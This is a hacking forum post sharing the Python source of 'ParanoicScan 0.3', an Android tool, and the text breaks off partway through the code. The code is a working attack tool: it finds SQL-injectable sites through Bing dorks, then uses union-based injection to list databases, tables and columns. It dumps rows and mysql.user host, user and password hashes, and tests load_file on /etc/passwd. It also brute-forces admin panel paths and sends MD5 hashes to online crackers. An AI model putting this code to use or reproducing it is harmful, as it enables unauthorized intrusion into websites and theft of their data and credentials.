[Python-Android] ParanoicScan 0.3

Iniciado por BigBear, 3 Febrero 2014, 14:17 PM

0 Miembros y 1 Visitante están viendo este tema.

BigBear

Un simple script en python para android , el script tiene las siguientes funciones :

  • Scannea en bing buscando SQLI
  • Un completo scanner SQLI
  • Buscador de panel de administracion
  • Codificador de MD5
  • Codificador y Decodificador de Base64 y Hex
  • Localizador de IP y sus DNS
  • Crackeador de para hashes MD5
  • HTTP FingerPrinting

    Unas imagenes :























    El codigo :

    Código (perl) [Seleccionar]

    #!usr/bin/python
    # -*- coding: utf-8 -*-
    #################################################################################
    #This software is Copyright (c) 2014 by Doddy Hackman.
    #
    #This is free software, licensed under:
    #
    #  The Artistic License 1.0
    #
    #The Artistic License
    #
    #Preamble
    #
    #The intent of this document is to state the conditions under which a Package
    #may be copied, such that the Copyright Holder maintains some semblance of
    #artistic control over the development of the package, while giving the users of
    #the package the right to use and distribute the Package in a more-or-less
    #customary fashion, plus the right to make reasonable modifications.
    #
    #Definitions:
    #
    #  - "Package" refers to the collection of files distributed by the Copyright
    #    Holder, and derivatives of that collection of files created through
    #    textual modification.
    #  - "Standard Version" refers to such a Package if it has not been modified,
    #    or has been modified in accordance with the wishes of the Copyright
    #    Holder.
    #  - "Copyright Holder" is whoever is named in the copyright or copyrights for
    #    the package.
    #  - "You" is you, if you're thinking about copying or distributing this Package.
    #  - "Reasonable copying fee" is whatever you can justify on the basis of media
    #    cost, duplication charges, time of people involved, and so on. (You will
    #    not be required to justify it to the Copyright Holder, but only to the
    #    computing community at large as a market that must bear the fee.)
    #  - "Freely Available" means that no fee is charged for the item itself, though
    #    there may be fees involved in handling the item. It also means that
    #    recipients of the item may redistribute it under the same conditions they
    #    received it.
    #
    #1. You may make and give away verbatim copies of the source form of the
    #Standard Version of this Package without restriction, provided that you
    #duplicate all of the original copyright notices and associated disclaimers.
    #
    #2. You may apply bug fixes, portability fixes and other modifications derived
    #from the Public Domain or from the Copyright Holder. A Package modified in such
    #a way shall still be considered the Standard Version.
    #
    #3. You may otherwise modify your copy of this Package in any way, provided that
    #you insert a prominent notice in each changed file stating how and when you
    #changed that file, and provided that you do at least ONE of the following:
    #
    #  a) place your modifications in the Public Domain or otherwise make them
    #     Freely Available, such as by posting said modifications to Usenet or an
    #     equivalent medium, or placing the modifications on a major archive site
    #     such as ftp.uu.net, or by allowing the Copyright Holder to include your
    #     modifications in the Standard Version of the Package.
    #
    #  b) use the modified Package only within your corporation or organization.
    #
    #  c) rename any non-standard executables so the names do not conflict with
    #     standard executables, which must also be provided, and provide a separate
    #     manual page for each non-standard executable that clearly documents how it
    #     differs from the Standard Version.
    #
    #  d) make other distribution arrangements with the Copyright Holder.
    #
    #4. You may distribute the programs of this Package in object code or executable
    #form, provided that you do at least ONE of the following:
    #
    #  a) distribute a Standard Version of the executables and library files,
    #     together with instructions (in the manual page or equivalent) on where to
    #     get the Standard Version.
    #
    #  b) accompany the distribution with the machine-readable source of the Package
    #     with your modifications.
    #
    #  c) accompany any non-standard executables with their corresponding Standard
    #     Version executables, giving the non-standard executables non-standard
    #     names, and clearly documenting the differences in manual pages (or
    #     equivalent), together with instructions on where to get the Standard
    #     Version.
    #
    #  d) make other distribution arrangements with the Copyright Holder.
    #
    #5. You may charge a reasonable copying fee for any distribution of this
    #Package.  You may charge any fee you choose for support of this Package. You
    #may not charge a fee for this Package itself. However, you may distribute this
    #Package in aggregate with other (possibly commercial) programs as part of a
    #larger (possibly commercial) software distribution provided that you do not
    #advertise this Package as a product of your own.
    #
    #6. The scripts and library files supplied as input to or produced as output
    #from the programs of this Package do not automatically fall under the copyright
    #of this Package, but belong to whomever generated them, and may be sold
    #commercially, and may be aggregated with this Package.
    #
    #7. C or perl subroutines supplied by you and linked into this Package shall not
    #be considered part of this Package.
    #
    #8. The name of the Copyright Holder may not be used to endorse or promote
    #products derived from this software without specific prior written permission.
    #
    #9. THIS PACKAGE IS PROVIDED "AS IS" AND WITHOUT ANY EXPRESS OR IMPLIED
    #WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF
    #MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
    #
    #The End
    #
    #################################################################################
    #Paranoic Scan 0.3
    #Android Version
    #(C) Doddy Hackman 2014
    #################################################################################

    import android,urllib2,socket,binascii,re,base64,hashlib

    webvul = ""

    # Functions

    def hexencoder(texto):
    return "[+] Result : "+"0x"+str(binascii.hexlify(texto))

    def hexdecoder(texto):
    text = re.sub("0x","",texto)
    return "[+] Result : "+binascii.unhexlify(text)

    def base64encoder(texto):
    return "[+] Result : "+base64.b64encode(texto)

    def base64decoder(texto):
    return "[+] Result : "+base64.b64decode(texto)

    def md5encoder(texto):
    return "[+] Result : "+hashlib.md5(texto).hexdigest()

    def reem(texto,parte):
    return re.sub(parte,"hackman",texto)

    def regexver(code):
    if (re.findall("K0BRA(.*?)K0BRA",code)):
     return True
    else:
     return False

    def regexdar(code):
    if (re.findall("K0BRA(.*?)K0BRA",code)):
     return re.findall("K0BRA(.*?)K0BRA",code)[0]

    def toma(web) :
    nave = urllib2.Request(web)
    nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
    op = urllib2.build_opener()
    return op.open(nave).read()

    def tomar(web,vars) :
    nave = urllib2.build_opener()
    nave.add_header = [('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5')]
    return nave.open(web,vars).read()

    def getdata(web) :
    nave = urllib2.Request(web)
    nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
    op = urllib2.build_opener()
    return op.open(nave).info()

    def bypass(bypass):
    if bypass == "--":
     return("+","--")
    elif bypass == "/*":
     return("/**/","/**/")
    else:
     return("+","--")
     
    def showtables(web):
    pass1,pass2 = bypass("--")
    respuesta = ""
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
    respuesta = respuesta + "[+] Searching tables ...\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     respuesta = respuesta + "[+] Tables Found : "+numbers+"\n\n"
     for counter in range(17,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       table = re.findall("K0BRA(.*?)K0BRA",code2)
       table = table[0]
       respuesta = respuesta + "[Table Found] : "+table+"\n"
    else:
     respuesta = respuesta + "[-] Not Found\n"
    respuesta = respuesta + "\n[+] Finished"
    return respuesta

    def showcolumns(web,tabla):
    respuesta = ""
    pass1,pass2 = bypass("--")
    tabla2 = tabla
    tabla = "0x"+str(binascii.hexlify(tabla))
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
    respuesta = respuesta + "[+] Searching columns ...\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     respuesta = respuesta + "[+] Columns Found : "+numbers+"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       column = re.findall("K0BRA(.*?)K0BRA",code2)
       column = column[0]
       respuesta = respuesta + "\n[Column Found in table "+str(tabla2)+"] : "+str(column)
    else:
     respuesta = respuesta + "[-] Not Found"
    respuesta = respuesta + "\n\n[+] Finished"
    return respuesta

    def showdbs(web):
    respuesta = ""
    pass1,pass2 = bypass("--")
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
    respuesta = respuesta + "[+] Searching DBS ...\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     respuesta = respuesta + "[+] DBS Found : "+numbers+"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       db = re.findall("K0BRA(.*?)K0BRA",code2)
       db = db[0]
       respuesta = respuesta + "\n[DB Found] : "+db
    else:
     respuesta = respuesta + "[-] Not Found"
    respuesta = respuesta + "\n\n[+] Finished"
    return respuesta

    def dumper(web,table,col1,col2):
    respuesta = ""
    pass1,pass2 = bypass("--")
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
    code1 = toma(web1+pass1+"from"+pass1+table+pass2)
    respuesta = respuesta + "[+] Searching values ...\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     respuesta = respuesta + "[+] Values Found : "+numbers+"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       c1 = re.findall("K0BRA(.*?)K0BRA",code2)
       c1 = c1[0]
       c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
       c2 = c2[0]
       respuesta = respuesta + "\n["+col1+"] : "+c1+"\n"
       respuesta = respuesta + "["+col2+"] : "+c2+"\n"
    else:
     respuesta = respuesta + "[-] Not Found\n"
    respuesta = respuesta + "\n[+] Finished"
    return respuesta

    def mysqluser(web):
    pass1,pass2 = bypass("--")
    respuesta = ""
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
    respuesta = respuesta + "[+] Searching mysql.user ...\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     respuesta = respuesta + "[+] Users Found : "+numbers+"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       host = re.findall("K0BRA(.*?)K0BRA",code2)
       host = host[0]
       user = re.findall("K0BRA1(.*?)K0BRA1",code2)
       user = user[0]
       passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
       passw = passw[0]
       respuesta = respuesta + "\n[Host] : "+host
       respuesta = respuesta + "\n[User] : "+user
       respuesta = respuesta + "\n[Pass] : "+passw+"\n"    
    else:
     respuesta = respuesta + "[-] Not Found\n"
    respuesta = respuesta + "\n[+] Finished"
    return respuesta

    def showcolumnsdb(web,db,table):
    respuesta = ""
    db2 = db
    table2 = table
    db = "0x"+str(binascii.hexlify(db))
    table = "0x"+str(binascii.hexlify(table))
    pass1,pass2 = bypass("--")
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)
    respuesta = respuesta + "[+] Searching columns in DB ...\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     respuesta = respuesta + "\n[+] Columns Found : "+str(numbers)+"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       column = re.findall("K0BRA(.*?)K0BRA",code2)
       column = column[0]
       respuesta = respuesta + "\n[Column Found] : "+str(column)
    else:
     respuesta = respuesta + "\n[-] Not Found"
    respuesta = respuesta + "\n\n[+] Finished"
    return respuesta

    def showtablesdb(web,db):
    respuesta = ""
    db2 = db
    db = "0x"+str(binascii.hexlify(db))
    pass1,pass2 = bypass("--")
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)
    respuesta = respuesta + "[+] Searching tables in DB ...\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
     numbers = re.findall("K0BRA(.*?)K0BRA",code1)
     numbers = numbers[0]
     respuesta = respuesta + "[+] Tables Found : "+str(numbers)+"\n"
     for counter in range(0,int(numbers)):
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
      if (re.findall("K0BRA(.*?)K0BRA",code2)):
       table = re.findall("K0BRA(.*?)K0BRA",code2)
       table = table[0]
       respuesta = respuesta + "\n[Table Found] : "+table
    else:
     respuesta = respuesta + "[-] Not Found"
    respuesta = respuesta + "\n\n[+] Finished"
    return respuesta

    def more(web):
    respuesta = ""
    pass1,pass2 = bypass("--")
    otraweb = web
    respuesta = respuesta + "[+] Searching DB Details ...\n"
    hextest = "0x2f6574632f706173737764"
    web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))",otraweb)
    code0 = toma(web1+pass2)
    if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
     datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
     datar = re.split("K0BRA",datax[0])
     respuesta = respuesta + "\n[+] Username : "+datar[1]
     respuesta = respuesta + "\n[+] Database : "+datar[2]
     respuesta = respuesta + "\n[+] Version : "+datar[3]+"\n"

    code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
    if (re.findall("K0BRA",code1)):
      respuesta = respuesta + "\n[+] mysql.user : on"
    code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
    if (re.findall("K0BRA",code2)):
      respuesta = respuesta + "\n[+] information_schema.tables : on"
    codetres = toma(web2)
    if (re.findall("ERTOR854",codetres)):
     respuesta = respuesta + "\n[+] load_file() : on"
    respuesta = respuesta + "\n\n[+] Finished"
    return respuesta

    def httpfinger(target):
    respuesta = ""
    try:
     respuesta = respuesta + str(getdata(target))
    except:
     respuesta = respuesta + "[-] Error"
    return respuesta

    def scanpanel(web):
    contador = 0
    panels=['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
    respuesta = ""
    respuesta = respuesta + "[+] Scanning ...\n"
    for path in panels:
     try:
      toma(web+"/"+path)
      respuesta = respuesta + "\n[+] Link : "+web+"/"+path
      contador = contador + 1
     except urllib2.URLError, e:
      pass

    if(contador==0) :
     respuesta = respuesta + "\n[+] Not Found"
    respuesta = respuesta + "\n\n[+] Finished"
    return respuesta

    def crackmd5(md5) :
    respuesta = ""
    code = tomar("http://md5online.net/index.php","pass="+md5+"&option=hash2text&send=Submit")
    if (re.findall("<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>",code)):
     rex = re.findall("<center><p>md5 :<b>(.*?)<\/b> <br>pass : <b>(.*?)<\/b><\/p>",code)
     return "[+] Hash : "+rex[0][1]
    else:
     code = tomar("http://md5decryption.com/index.php","hash="+md5+"&submit=Decrypt It!")
     if (re.findall("Decrypted Text: <\/b>(.*?)<\/font>",code)):
      rex = re.findall("Decrypted Text: <\/b>(.*?)<\/font>",code)
      return "[+] Hash : "+rex[0]
     else:
      code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+md5)
      if (re.findall("<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>",code)):
       rex = re.findall("<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>",code)
       return "[+] Hash : "+rex[0]
      else:
       return "[+] Hash : Not Found"
    return respuesta

    def locateip(pagina):

    respuesta = ""

    ip = socket.gethostbyname(str(pagina))
    code = toma("http://www.melissadata.com/lookups/iplocation.asp?ipaddress="+ip)

    respuesta = respuesta + "[++] IP Address Location\n"

    if (re.findall("City<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
     rex = re.findall("City<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
     city = rex[0][1]
     respuesta = respuesta + "\n[++] City : "+city
    else:
     respuesta = respuesta + "\n[++] City : Not Found"

    if (re.findall("Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
     rex = re.findall("Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
     country = rex[0][1]
     respuesta = respuesta + "\n[++] Country : "+country
    else:
     respuesta = respuesta + "\n[++] Country : Not Found"
     
    if (re.findall("State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)):
     rex = re.findall("State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>",code)
     state = rex[0][1]
     respuesta = respuesta + "\n[++] State : "+state
    else:
     respuesta = respuesta + "\n[++] State : Not Found"


    code = toma("http://www.ip-adress.com/reverse_ip/"+ip)

    if (re.findall("whois\/(.*?)\">Whois",code)):
     rex = re.findall("whois\/(.*?)\">Whois",code)
     respuesta = respuesta + "\n\n[++] DNS Founds\n"
     for dns in rex:
      respuesta = respuesta + "\n[+] "+dns

    return respuesta

    def sqltest(webs):
    respuesta = ""
    for web in webs :
     if re.findall("=",web):
      web = re.split("=",web)
      web = web[0]+"="

      try:
       code = toma(web+"-1+union+select+1--")
       if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
        respuesta = respuesta + "[SQLI] : "+web+"\n"
      except:
       pass
    return respuesta

    def limpiar(pag):

    limpia = []
    for p in pag:
     if p not in limpia:
      limpia.append(p)
    return limpia

    def bingscan(dork,count):

    respuesta = ""

    pag = []
    s = 10  

    while s <= int(count):
     try:
      code = toma("http://www.bing.com/search?q="+str(dork)+"&first="+str(s))
      d = re.findall("<h3><a href=\"(.*?)\"",code,re.I)
      s += 10
      for a in d:
       pag.append(a)
     except:
      pass

    pag = limpiar(pag)

    return pag


    ##
     
    aplicacion = android.Android()

    def menuencoder():

    aplicacion.dialogCreateAlert("Encoders")
    aplicacion.dialogSetItems(["MD5 Encoder","Base64 Encoder","Base64 Decoder","Hex Encoder","Hex Decoder","Exit"])
    aplicacion.dialogShow()
    reh = aplicacion.dialogGetResponse().result
    reb = reh["item"]

    if reb==0:

     aplicacion.dialogCreateAlert("MD5 Encoder")
     
     aplicacion.dialogGetInput("MD5 Encoder","Enter Text")
     ref = aplicacion.dialogGetResponse().result

     if not ref['which'] == 'positive' :
      menuencoder()
     else:
      texto = ref['value']

      aplicacion.dialogCreateSpinnerProgress("MD5 Encoder","[+] Encoding ...")
      aplicacion.dialogShow()

      don = md5encoder(texto)

      aplicacion.dialogDismiss()

      aplicacion.dialogCreateAlert("MD5 Encoder",don)
      aplicacion.dialogSetPositiveButtonText("Done")
      aplicacion.dialogShow()
     
      op = aplicacion.dialogGetResponse().result

      if op["which"] == "positive" :
       menuencoder()


    if reb==1 :

     aplicacion.dialogCreateAlert("Base64 Encoder")
     
     aplicacion.dialogGetInput("Base64 Encoder","Enter Text")
     ref = aplicacion.dialogGetResponse().result

     if not ref['which'] == 'positive' :
      menuencoder()
     else:
      texto = ref['value']

      aplicacion.dialogCreateSpinnerProgress("Base64 Encoder","[+] Encoding ...")
      aplicacion.dialogShow()

      don = base64encoder(texto)

      aplicacion.dialogDismiss()

      aplicacion.dialogCreateAlert("Base64 Encoder",don)
      aplicacion.dialogSetPositiveButtonText("Done")
      aplicacion.dialogShow()
     
      op = aplicacion.dialogGetResponse().result

      if op["which"] == "positive" :
       menuencoder()

    if reb==2 :

     aplicacion.dialogCreateAlert("Base64 Decoder")
     
     aplicacion.dialogGetInput("Base64 Decoder","Enter Text")
     ref = aplicacion.dialogGetResponse().result

     if not ref['which'] == 'positive' :
      menuencoder()
     else:
      texto = ref['value']

      aplicacion.dialogCreateSpinnerProgress("Base64 Decoder","[+] Encoding ...")
      aplicacion.dialogShow()

      don = base64decoder(texto)

      aplicacion.dialogDismiss()

      aplicacion.dialogCreateAlert("Base64 Decoder",don)
      aplicacion.dialogSetPositiveButtonText("Done")
      aplicacion.dialogShow()
     
      op = aplicacion.dialogGetResponse().result

      if op["which"] == "positive" :
       menuencoder()
     
    if reb==3 :

     aplicacion.dialogCreateAlert("Hex Encoder")
     
     aplicacion.dialogGetInput("Hex Encoder","Enter Text")
     ref = aplicacion.dialogGetResponse().result

     if not ref['which'] == 'positive' :
      menuencoder()
     else:
      texto = ref['value']

      aplicacion.dialogCreateSpinnerProgress("Hex Encoder","[+] Encoding ...")
      aplicacion.dialogShow()

      don = hexencoder(texto)

      aplicacion.dialogDismiss()

      aplicacion.dialogCreateAlert("Hex Encoder",don)
      aplicacion.dialogSetPositiveButtonText("Done")
      aplicacion.dialogShow()
     
      op = aplicacion.dialogGetResponse().result

      if op["which"] == "positive" :
       menuencoder()


    if reb==4 :

     aplicacion.dialogCreateAlert("Hex Decoder")
     
     aplicacion.dialogGetInput("Hex Decoder","Enter Text")
     ref = aplicacion.dialogGetResponse().result

     if not ref['which'] == 'positive' :
      menuencoder()
     else:
      texto = ref['value']

      aplicacion.dialogCreateSpinnerProgress("Hex Decoder","[+] Encoding ...")
      aplicacion.dialogShow()

      don = hexdecoder(texto)

      aplicacion.dialogDismiss()

      aplicacion.dialogCreateAlert("Hex Decoder",don)
      aplicacion.dialogSetPositiveButtonText("Done")
      aplicacion.dialogShow()
     
      op = aplicacion.dialogGetResponse().result

      if op["which"] == "positive" :
       menuencoder()

    if reb==5:
     menu()

    def menusql():

    aplicacion.dialogCreateAlert("SQLI Scanner")
    aplicacion.dialogSetItems(["Get Tables","Get Columns","Get Databases","Get Tables of DB","Get Columns of DB","Get mysql.users","Get Details DB","Dump Values","Exit"])
    aplicacion.dialogShow()
    reez = aplicacion.dialogGetResponse().result
    opsql = reez["item"]

    if opsql==0:

     aplicacion.dialogCreateAlert("SQLI Scanner")
     aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Tables ...")
     aplicacion.dialogShow()

     don = showtables(webvul)

     aplicacion.dialogDismiss()

     aplicacion.dialogCreateAlert("SQLI Scanner",don)
     aplicacion.dialogSetPositiveButtonText("Done")
     aplicacion.dialogShow()
     
     op = aplicacion.dialogGetResponse().result

     if op["which"] == "positive" :
      menusql()
       
    if opsql==1 :

     aplicacion.dialogCreateAlert("SQLI Scanner")
     
     aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
     ref = aplicacion.dialogGetResponse().result

     if not ref['which'] == 'positive' :
      menusql()
     else:  
      tabla = ref['value']

      aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Columns ...")
      aplicacion.dialogShow()

      don = showcolumns(webvul,tabla)
     
      aplicacion.dialogDismiss()

      aplicacion.dialogCreateAlert("SQLI Scanner",don)
      aplicacion.dialogSetPositiveButtonText("Done")
      aplicacion.dialogShow()
     
      op = aplicacion.dialogGetResponse().result

      if op["which"] == "positive" :
       menusql()
       
    if opsql==2 :

     aplicacion.dialogCreateAlert("SQLI Scanner")
     aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Databases ...")
     aplicacion.dialogShow()

     don = showdbs(webvul)

     aplicacion.dialogDismiss()

     aplicacion.dialogCreateAlert("SQLI Scanner",don)
     aplicacion.dialogSetPositiveButtonText("Done")
     aplicacion.dialogShow()
     
     op = aplicacion.dialogGetResponse().result

     if op["which"] == "positive" :
      menusql()
     
    if opsql==3 :

     aplicacion.dialogCreateAlert("SQLI Scanner")
     
     aplicacion.dialogGetInput("SQLI Scanner","Enter DB Name")
     ref = aplicacion.dialogGetResponse().result

     if not ref['which'] == 'positive' :
      menusql()
     else:  
      db = ref['value']

      aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Tables of DB ...")
      aplicacion.dialogShow()

      don = showtablesdb(webvul,db)
     
      aplicacion.dialogDismiss()

      aplicacion.dialogCreateAlert("SQLI Scanner",don)
      aplicacion.dialogSetPositiveButtonText("Done")
      aplicacion.dialogShow()
     
      op = aplicacion.dialogGetResponse().result

      if op["which"] == "positive" :
       menusql()

    if opsql==4 :

     aplicacion.dialogCreateAlert("SQLI Scanner")
     
     aplicacion.dialogGetInput("SQLI Scanner","Enter DB Name")
     ref = aplicacion.dialogGetResponse().result

     if not ref['which'] == 'positive' :
      menusql()
     else:  
      db = ref['value']

